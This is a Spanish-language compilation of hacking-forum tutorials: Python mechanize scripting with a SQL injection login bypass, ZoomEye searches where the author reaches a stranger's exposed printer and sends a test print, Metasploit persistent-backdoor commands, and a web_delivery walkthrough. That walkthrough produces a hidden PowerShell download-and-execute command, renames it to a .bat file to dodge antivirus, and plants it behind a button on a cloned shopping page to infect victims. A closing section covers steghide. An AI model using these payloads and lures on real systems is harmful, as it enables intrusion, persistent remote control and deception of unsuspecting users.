>>> respuesta = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')

luego de ello utilizamos la instancia open para poder interactuar con nuestro primer objeto llamado brow y establecer una petición con url No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'

>>> print respuesta.geturl()

Entonces nosotros queremos recibir la respuesta del servidor, por ello le daremos print en el objeto respuesta y añadiremos geturl que nos permitirá obtener la url del servidor. 

>>> print No tienes permitido ver los links. Registrarse o Entrar a mi cuenta()

Nos permitirá poder recibir la respuesta de informacion del servidor.

Date: Mon, 21 Nov 2016 04:29:00 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.5.38
X-Powered-By: PHP/5.5.38
Set-Cookie: PHPSESSID=0h5f5rqpo4a06hduh8e067lg16; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=0h5f5rqpo4a06hduh8e067lg16; path=/; httponly
Set-Cookie: security=impossible; httponly
Content-Length: 1567
Connection: close
Content-Type: text/html;charset=utf-8
Content-Type: text/html; charset=UTF-8


Si nosotros podemos ver este tipo de informacion de la versiones del servicios que  tiene, podemos ver que nos arroja como resultado:


Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.5.38

Fácilmente podemos buscar "Exploits", para poder elaborar un ataque remoto si lo vemos de esa perspectiva.

Bien continuemos con esto, si nosotros deseamos enviar peticiones a formularios, en este ejemplo buscaremos "vulnerabilidades SQLi metodo POST", para ello tengo el siguiente escenario.



Nuevamente añadiré mi instancia y todo los procesos para poder establecer una respuesta del servidor. 

>>> import mechanize
>>> br = mechanize.Browser()
>>> respuesta = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')


Luego vamos a establecer una búsqueda de todos los formularios que contenga el modulo del login.

>>> for form in br.forms():
...     print form
...


Vemos que nos arroja los siguientes formularios, en la linea 1 llamada login:

<login POST No tienes permitido ver los links. Registrarse o Entrar a mi cuenta application/x-www-form-urlencoded
  <TextControl(login_user=)>
  <PasswordControl(login_password=)>
  <SubmitControl(mysubmit=Login) (readonly)>>


comprobaremos si son los mismos formularios, desde el navegador web.


podemos observar que los formularios son los mismos, entonces no hay ningún problema.

Aclaremos los siguientes puntos, mechanize tiene la opción de poder manipular nuestros atributos y establecer los envíos de datos por su modulo submit.

Continuando con siguiente, debemos establecer que linea de formularios trabaremos, como solo existe el valor uno, de manera lógica se establece como 0, si existieran 2 y nuestro formulario estuviera de bajo del primero seria 1

>>> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta_form(nr=0)

luego de añadir el numero del formulario que trabajaremos.
Vamos añadir los atributos a los respectivos formularios, en esta prueba hemos utilizado un conocido Bypass = ' or 1=1--

>>> br.form['login_user'] = "' or 1=1--"
>>> br.form['login_password'] = "' or 1=1--"

Entonces enviaremos nuestra petición al servidor de la siguiente manera.

>>> br.submit()

<response_seek_wrapper at 0xb73fd12cL whose wrapped object = <closeable_response at 0xb74030ecL whose fp = <socket._fileobject object at 0xb746ed6c>>>

Vemos que nos ha enviado una respuesta, ahora lo que debemos hacer por ultimo es leer la fuente de la pagina ver, para ver que respuesta nos ha arrojado.

>>> print br.response().read()


<html>
<head>
</head>
<body bgcolor="#000000">
<font size="3" color="#FFFF00">
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>

<font size="5" color= "#FFFF00">You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1</font><tr><td colspan="2" style="text-align:center;"><br/><p style="color:#FF0000;">
<center>
<img src="../images/slap1.jpg">
</center>
</p></td></tr>

Testing



Sencillo verdad, pero solo estamos estableciendo valores definidos por nosotros mismos, para poder entender Python desde esa perspectiva, para después crear nuestra propios herramientas y establezcan las funciones por si mismas.

Un consejo, si eres el master de una web trata de controlar y ver los registros de las conexiones entrantes.



Si en vez de establecer una petición para auditoria, deseamos entrar a un panel administrativo por medio de sus credenciales.

pues entraremos nuevamente en la plataforma DVWA



Pero como estaremos en un panel administrativo debemos definir nuestra Cookie, para poder establecer conexión persistente desde la terminal, para ello utilizaremos el modulo: cookielib



>>> import mechanize
>>> import cookielib
>>> br = mechanize.Browser()


La libreria Cookielib sirve para poder establecer una Cookie, para establecer conexión de usuario sin perderla al momento de actualizar o retroceder.

Luego de ello, hemos instanciado nuestro objetivo Cookiejar, para establecer su función con nuestro modulo mechanize. 

>>> cj = cookielib.LWPCookieJar()
>>> br.set_cookiejar(cj)


Aquí estamos diciendo que no utilizaremos buscada de robots.

>>> br.set_handle_robots(False)

Luego de ello, los que le comentaba si nosotros actualizamos la plataforma por la terminar o regresamos, se nos cerrara la sesión ya que no establecimos el proceso de disponibilidad.

>>> br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

se acuerdan que hace momentos mostré los registros de conexiones por XAMPP, en esta instancia nos permite poder modificar nuestros agentes de usuario, quiere decir que podemos hacernos pasar por una sistema MAC OS y simular que estamos navegando desde el navegador Opera.

>>> br.addheaders = [('User-agent', 'Opera/9.25 (Macintosh; PPC Mac OS X; U; en)')]


Entonces estableceremos la URL,que deseamos enviar peticiones.

>>> r = No tienes permitido ver los links. Registrarse o Entrar a mi cuenta('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')

ahora haremos nuevamente una búsqueda de formularios.


>>> for form in br.forms():
...    print form
...


<POST No tienes permitido ver los links. Registrarse o Entrar a mi cuenta application/x-www-form-urlencoded
  <TextControl(username=)>
  <PasswordControl(password=)>
  <SubmitControl(Login=Login) (readonly)>
  <HiddenControl(user_token=e8db4eb8dbfcad683b1ab919c61cb253) (readonly)>>

Si tu defines los atributos, sin especificar con que formulario desees trabajar, te saldrá error, por el simple hecho de no asignar el objeto.

>>> br.form['username'] = 'admin'

Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: 'NoneType' object does not support item assignment

Entonces procederemos a elaborar dicha función correctamente asignando el valor 0, ya que en programación el valor inicial 1 es igual a 0

>>> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta_form(nr=0)

Añadiremos nuestros atributos ( las credenciales reales )

>>> br.form['username'] = 'admin'
>>> br.form['password'] = 'password'


Enviaremos nuestro petición.

>>> br.submit()

<response_seek_wrapper at 0xb73d9a6cL whose wrapped object = <closeable_response at 0xb73f004cL whose fp = <socket._fileobject object at 0xb73ce9ac>>>

leeremos la respuesta del servidor por medio del código fuente.

>>> print br.response().read()



Comprobaremos si es el mismo código por medio del navegador gráfico.



Correcto, siempre cuando hagan consultas desde mechanize deben tener en claro que están interactuando como si fuese desde un navegador gráfico, pero desde la terminal.

ahora miremos los logs o registros del servidor apache para ver si nuestro agente de usuario que es Mozilla/Firefox  - Linux 32bits a cambiado a Opera - Mac OS



Espero les halla encantado este humilde articulo, me despido estaré estudiando mas métodos para poder continuar con este pequeño curso de Python.

Saludos!!!!
#37


Saludos nuevamente hermanos de underc0de, de nuevo vengo a joderlos jajaj okno, bueno en esta oportunidad les traigo un buscador parecido a Shodan, pero que tienen aun mas información que el mencionado, algunos la están catalogando como la hermana de SHODAN, para mi es un proyecto muy interesante, es de origen chino y fue desarrollado en el año 2014 les presento a ZoomEye

Pagina:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Un pequeño ejemplo de ello, si tu deseas utilizar la vista de mapa en ZoomEye es muy útil, pero a su vez algo tedioso ya que al buscar un determinado servicio les aparece lo siguiente:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Veamos algunos de sus "Dorks", ustedes se asombraran con los siguientes:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Me pareció interesante ver 2 dorks con el framework metasploit, viendo la información de uno de ellos me percate lo siguiente.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Te indica que el servidor esta backdorizado y también te muestra el código del payload corriendo, sin duda este servidor de china esta mas owneado que una web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta xD

veamos a las impresas conectadas en WAN, cuantas tienen su servicios disponibles para ser manipuladas.



Veamos entremos, en mi caso yo entre a una de EE.UU:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Status: Connected
Host Name: HPD0DD7C
IP Address: 192.168.0.15
Hardware (MAC) Address: 68B599CFDE7E
SSID: HOME BASE 2.4G



Modelo:

Product Name     HP Officejet Pro 8500 A910
Product Model Number     CM755A
Product Serial Number     CN0B4AR2HJ
Service ID     21015
Firmware Version     LRP1FN1621BR
Total Page Count     13635
Country/Region 



como pueden observar acabo de enviar una imprisión de prueba.
para poder entrar a mas servicios privados deben registrarse en el siguiente enlace:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Algo importante que tengo que mencionar y también explicar porque no hago tan extenso este articulo, el 70 % de Dorks son similares a shodan, así que prueben este servicio se los recomiendo.

posdata: tengo sueño  xD

Saludos!

#38
Hacking / Creando Backdoor Persistente en metasploit
Diciembre 04, 2016, 12:18:02 AM


Saludos fieles lectores en esta oportunidad les traigo un POST sobre como crear tu Backdoor persistente en msfconsole, ha pedido de un seguidor del blog que me dejo un mensaje en privado.

¿Que es Backdoor?

se le domina como puerta trasera, cabe decir que se ejecuta un "Script" remoto a la maquina de la victima con conexion puente al ordenador del atacante, para dejar al sistema vulnerado en escucha siempre.

El Backdoor persistente es compatible con todas las versiones de Windows.

Lo primero que deben tener en cuenta es lo siguiente, penetrar el sistema de tu victima, dejo los siguientes posts donde enseño como hacerlo por diferentes métodos, de igual manera burlar los "AV":


Luego de crear tu "Payload", posteriormente enviar el archivo infectado a tu victima tendremos su session meterpreter, en este caso haré la prueba de concepto en un Windows 7 service pack 1



Entonces lo que haremos sera ejecutar el comando persistente por default.
Código: text

meterpreter > run persistence

voy a dejar bien claro lo siguiente, al ejecutar el comando run persistente estas dejando todo por Default, por ejemplo:

El puerto: 4444
IP: 192.168.1.35 (tu IP se adjuntara automáticamente)
Script Upload - directorio donde se alojara el Script vbs, que se ejecutara al momento que inicie el sistema de la victima.



Como vemos el archivo se subió correctamente en la carpeta por default.



Entonces reiniciaremos el equipo de la victima para ver si realmente nos carga  su sesión meterpreter, pero antes configuraremos el puerto de escucha, ya que en la infección se utilizo el puerto 5555.



Esperemos que cargue nuevamente el sistema windows, pero vemos en la siguiente imagen que hemos cambiado el puerto de escucha reemplazando el 5555 a 4444 que fue generado al momento de ejecutar persistence.



Como podemos observar automáticamente hemos tenido la conexión meterpreter.

ahora viene la pregunta de muchos:

¿si yo deseo establecer una IP y puerto diferente?

Pues sencillo vamos a utilizar algunos argumentos de persitence, un ejemplo es el siguiente:

Código: text
run persistence -U -i 5 -p 4444 -r 192.168.1.35


-U >> ejecuta automáticamente el usuario comprometido y establece logs.
-i  >> segundos de conexión para establecer. 
-p >> puerto de escucha.
-r >> IP de la maquina del atacante a añadir.




Entonces le añadí de igual manera el puerto 4444, y deje mi IP estatica por default, ya que es mi maquina de ataque:

Reinicie bruscamente el windows 7, entonces esperaremos a que cargue nuevamente.   



de igual manera hemos tenido su sesión meterpreter automáticamente, configurando nuestro propio script persistente.
#39


Saludos nuevamente mis queridos fieles lectores, en esta oportunidad les traigo un nuevo método de ataque de POST EXPLOTACIÓN por medio de un modulo llamado Web Delivery, que nos permite crear archivos "Maliciosos" con extensiones Python, php y powershell,  en este tutorial utilizaremos la extensión universal por defecto de windows ps - Powershell.

Primero arrancaremos el framework metasploit, luego configuraremos el respectivo exploit:


Código: text

msf > use exploit/multi/script/web_delivery - Estableciendo Web Delivery
LHOST => 192.168.1.35                              - Nuestra IP
LPORT => 8081                                           - Nuestro puerto de escucha
msf exploit(web_delivery) > set URIPATH / - Directorio PATH del servidor
msf exploit(web_delivery) > show targets 
msf exploit(web_delivery) > set target 2     - Escogimos 2 = PowerShell
msf exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > exploit


una ves entendido lo anterior, lo que hicimos fue crear nuestro servidor meterpreter en escucha y nos apareció lo siguiente en las lineas abajo


powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta');

Algunos quizás no tengan entendimiento de ello, se los simplificare de la siguiente manera, este es el código fuente del archivo powershell que nos permitirá obtener la conexión de nuestra victima una ves que ejecute dicho archivo.



Como vemos este archivo lo eh guardado en formato .bat, para camuflarlo de algunos AV, lo llame "hola.bat" y lo aloje a la carpeta: /var/www/html donde se almacena nuestro archivos del servidor local apache.

¿Ustedes se preguntaran porque?

Es simple porque pienso utilizar un index de una pagina de "Ventas" online de comida y adjuntar mi archivo infectado .bat en un botón.

Antes de pasar este proceso, activen su servidor apache:
Código: text

root@kali:/# service apache2  start




Les dejare un pequeño ejemplo:

Source original:

<input name="input" value="" onclick="setLocation('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')" type="button">


Source editado

<input name="input" value="" onclick="setLocation('192.168.1.35/hola.bat')" type="button">

solamente le reemplazan la URL original por su dirección de archivo.

Una vez hecho todo este proceso, le envían la URL a su victima en mi caso yo lo estoy asiendo en mi red local, ustedes pueden hacerlo desde una web externa si desean.



Como vemos en el momento que nuestra victima haga clic en el botón automáticamente se descargara nuestro archivo "hola.bat", entonces aquí viene lo mejor  "La curiosidad del ser humano, cuando se presenta una oportunidad", quiere decir que una ves la victima ejecute el archivo, tendremos su sesión meterpreter.




Espero hallan aprendido algo nuevo de este servidor, para mi es un placer enseñarle lo poco que se.
Saludos y éxitos!
#40


Saludos nuevamente mis fieles lectores en esta oportunidad les traigo la herramienta Steghide, que sirve para ocultar nuestros archivos en un formato de imagen, utilizando el proceso de esteganografía.

Steghide  es un programa de esteganografía que permite ocul­tar datos en varios tipos de imagen- y archivos de  audio.

Los respectivos muestreos de frecuencia de color no varían lo que hace que el adjunto  soporte  pruebas  estadísticas del primer orden.
Sus características incluyen el compactado y el encriptado de los datos adjuntos, y revisión automática de integridad usando  un  checksum. Se reconocen los formatos de archivo JPEG, BMP, WAV y AU para usar como archivos de portada. No existen  restricciones en el formato de los datos ocultos.

Referencia:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En este escenario lo ejecutaremos en Kali linux (Debian), primero debemos instalarlo.

Código: text
root@kali:~# apt-get install steghide




En mi caso ya tenia instalado el steghide, pero la añadir nuevamente su instalación se ha actualizado una nueva versión.
Una ves instalado lo siguiente haremos un ejemplo con un archivo .TXT y una imagen en JPG.



Como vemos los archivos que utilizaremos son:

Código: text
    oe.txt
    rosangela-espinoza.jpg


Entonces lo que haremos sera empezar con el procedimiento:

Código: text
root@kali:~/Desktop# steghide embed -cf rosangela-espinoza.jpg -ef oe.txt


embed > sirve para adjuntar  el archivo txt en la imagen de formato jpg



Luego de añadir sus respectivos argumentos, nos saldrán 2 lineas que nos dirán "salvoproducto", la cual deben ingresar una contraseña en mi caso añadí:

tujefaxD

una ves hecho el procedimiento empezara nuestro proceso de ocultación, entonces veremos como quedo nuestro archivo.



Vemos que la imagen no ha sufrido ninguna modificación gráfica, ni en su extensión, pero debo aclarar los siguiente: que dependiendo de la cantidad de almacenamiento del archivo que deseamos ocultar, nuestra imagen tendrá también dicho peso.

Pero como mi archivo oe.txt tiene menos de 8 caracteres no aumentado el tamaño del archivo.



Bueno entonces, que pasaría si deseas extraer el archivo oculto en la imagen, en mi caso yo soy algo paranoico mis contraseñas las tengo siempre en local en un txt en mi pendrive, pero gracias a  steghide lo puedo ocultar en un formato de imagen, que solo le permitirá leer al que ejecute el archivo la imagen y no en texto plano donde verdaderamente se encuentra mi password.



vemos que se ha extraído completamente el archivo "oe.txt"



comprobamos que no ha sido afectado ninguna carácter de mi supuesta password, espero les halla gustado este articulo.
no solamente pueden adjuntar un archivo de texto, si no cualquier tipo de archivo que deseen ocultar.

Un saludo!!